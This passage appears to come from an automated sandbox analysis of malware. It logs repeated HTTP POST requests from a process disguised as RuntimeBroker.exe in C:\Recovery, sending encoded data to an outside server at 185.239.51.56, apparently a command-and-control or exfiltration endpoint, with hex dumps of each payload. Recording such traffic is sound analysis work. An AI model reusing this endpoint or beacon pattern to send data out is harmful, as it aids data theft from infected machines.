                                                                                                  Data Ascii: S^[U_[^W_ZZSWYV__X]EQWW[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$(/*_"2 4\--Z='-+81^#%= ($ %$>Y9"^%#[.
                                                                                                  Jan 1, 2025 02:27:17.101691008 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:17.238337994 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:16 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  7192.168.2.449746185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:17.368746996 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:17.722012997 CET2504OUTData Raw: 56 5c 5e 5f 5f 5c 5e 54 5f 5a 5a 53 57 51 56 5f 5f 55 5d 45 51 52 57 5e 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V\^__\^T_ZZSWQV__U]EQRW^^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$</>_610\&38]8.-?.?8^!&5#+?3+&4=--"^%#[.
                                                                                                  Jan 1, 2025 02:27:18.079006910 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:18.087153912 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:17 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  8192.168.2.449747185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:18.207506895 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:18.566746950 CET2504OUTData Raw: 56 5e 5b 50 5a 5b 5e 57 5f 5a 5a 53 57 5d 56 5e 5f 5f 5d 48 51 5c 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V^[PZ[^W_ZZSW]V^__]HQ\W[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$(2[5?'33/-1?'.?(:#%[4^?Q3]8^$$"\9"^%#[.6
                                                                                                  Jan 1, 2025 02:27:18.908637047 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:19.045605898 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:18 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  9192.168.2.449749185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:19.258296967 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:19.612560034 CET2504OUTData Raw: 56 59 5b 52 5f 58 5e 53 5f 5a 5a 53 57 5d 56 54 5f 5e 5d 41 51 56 57 59 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VY[R_X^S_ZZSW]VT_^]AQVWY^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$),=5& [/=(%+(&!55#/W%;14!:"^%#[.6


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  10192.168.2.449751185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:19.868280888 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:20.221915960 CET1600OUTData Raw: 56 5a 5e 53 5a 58 5e 50 5f 5a 5a 53 57 5a 56 54 5f 58 5d 42 51 5d 57 5d 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VZ^SZX^P_ZZSWZVT_X]BQ]W]^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['C+)#";1+8-2<%(8"&* ^4$(^%7*,="^%#[.*
                                                                                                  Jan 1, 2025 02:27:20.591074944 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:20.598375082 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:20 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  11192.168.2.449752185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:19.999528885 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2500
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:20.346947908 CET2500OUTData Raw: 53 5a 5e 55 5a 5f 5e 54 5f 5a 5a 53 57 59 56 57 5f 5d 5d 46 51 52 57 5d 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SZ^UZ_^T_ZZSWYVW_]]FQRW]^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$+,[!,]%?,-.?$2_?;9_6&*^ (?%8$1"\."^%#[."
                                                                                                  Jan 1, 2025 02:27:20.734596968 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:20.744664907 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:20 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  12192.168.2.449753185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:20.864361048 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:21.221965075 CET2504OUTData Raw: 53 5a 5b 57 5f 5b 5e 51 5f 5a 5a 53 57 5c 56 55 5f 5b 5d 47 51 50 57 5d 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SZ[W_[^Q_ZZSW\VU_[]GQPW]^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['B(Z!"#10#;2+&Y+%"%%7+'+4^27.-"^%#[.2
                                                                                                  Jan 1, 2025 02:27:21.585427999 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:21.594379902 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:21 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  13192.168.2.449754185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:21.728800058 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:22.081331015 CET2504OUTData Raw: 53 5e 5b 57 5a 59 5e 50 5f 5a 5a 53 57 5d 56 55 5f 5c 5d 47 51 50 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S^[WZY^P_ZZSW]VU_\]GQPWX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$(<[5T<Y%U Y,>1<$(+!Z5&6#^+'88_%..="^%#[.6
                                                                                                  Jan 1, 2025 02:27:22.430083036 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:22.437249899 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:22 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  14192.168.2.449755185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:22.567907095 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:22.925164938 CET2504OUTData Raw: 56 52 5e 52 5a 59 5b 5d 5f 5a 5a 53 57 58 56 57 5f 59 5d 46 51 5c 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VR^RZY[]_ZZSWXVW_Y]FQ\W[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['C)/5#1,%U#;5(?8#%"(3W0;Z&4>X.="^%#[."
                                                                                                  Jan 1, 2025 02:27:23.278824091 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:23.288275003 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:23 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  15192.168.2.449756185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:23.411271095 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:23.768846035 CET2504OUTData Raw: 53 5f 5e 53 5f 58 5b 55 5f 5a 5a 53 57 5b 56 54 5f 5c 5d 48 51 5d 57 5e 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S_^S_X[U_ZZSW[VT_\]HQ]W^^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$(2!3%3#;=:?4>]((Z!2";7W3(Z2Q>\."^%#[..
                                                                                                  Jan 1, 2025 02:27:24.112343073 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:24.251940966 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:24 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  16192.168.2.449757185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:24.380208015 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:24.740216970 CET2504OUTData Raw: 56 5b 5b 55 5a 59 5e 53 5f 5a 5a 53 57 58 56 50 5f 58 5d 41 51 5d 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V[[UZY^S_ZZSWXVP_X]AQ]W[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$<?2X52& 8Y8.X<=+)!&143P%+2Q&9-"^%#[."
                                                                                                  Jan 1, 2025 02:27:25.090821028 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:25.099436045 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:24 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  17192.168.2.449758185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:25.240669966 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:25.596962929 CET2504OUTData Raw: 53 5f 5b 55 5a 5c 5b 51 5f 5a 5a 53 57 51 56 55 5f 5d 5d 47 51 55 57 5e 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S_[UZ\[Q_ZZSWQVU_]]GQUW^^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['<<51 [&7/=9<B1(8=["&Y4/0;0&>--"^%#[.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  18192.168.2.449759185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:25.618228912 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:25.971951008 CET1600OUTData Raw: 56 5b 5e 57 5a 5f 5e 51 5f 5a 5a 53 57 5a 56 56 5f 5b 5d 49 51 53 57 5c 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V[^WZ_^Q_ZZSWZVV_[]IQSW\^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['E+!2<208[/-:]=$*_+8"!6*7;,%8 ^172_-="^%#[.*
                                                                                                  Jan 1, 2025 02:27:26.330538034 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:26.338365078 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:26 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  19192.168.2.449760185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:25.740540028 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:26.097105026 CET2504OUTData Raw: 56 5f 5b 53 5a 59 5b 52 5f 5a 5a 53 57 5d 56 50 5f 58 5d 43 51 5d 57 5f 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V_[SZY[R_ZZSW]VP_X]CQ]W_^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$+<Z!"$2 /=:\?$1+(>6&= 8<3<2"]."^%#[.6
                                                                                                  Jan 1, 2025 02:27:26.462671995 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:26.599306107 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:26 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  20192.168.2.449761185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:26.723139048 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:27.081389904 CET2504OUTData Raw: 56 5e 5b 52 5f 5f 5e 57 5f 5a 5a 53 57 5f 56 56 5f 5d 5d 40 51 56 57 5c 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V^[R__^W_ZZSW_VV_]]@QVW\^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['E<,*"2$]2#?8.]<$=*85> $%;<]%Q!:"^%#[.>
                                                                                                  Jan 1, 2025 02:27:27.421133041 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:27.559798956 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:27 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  21192.168.2.449762185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:27.737857103 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
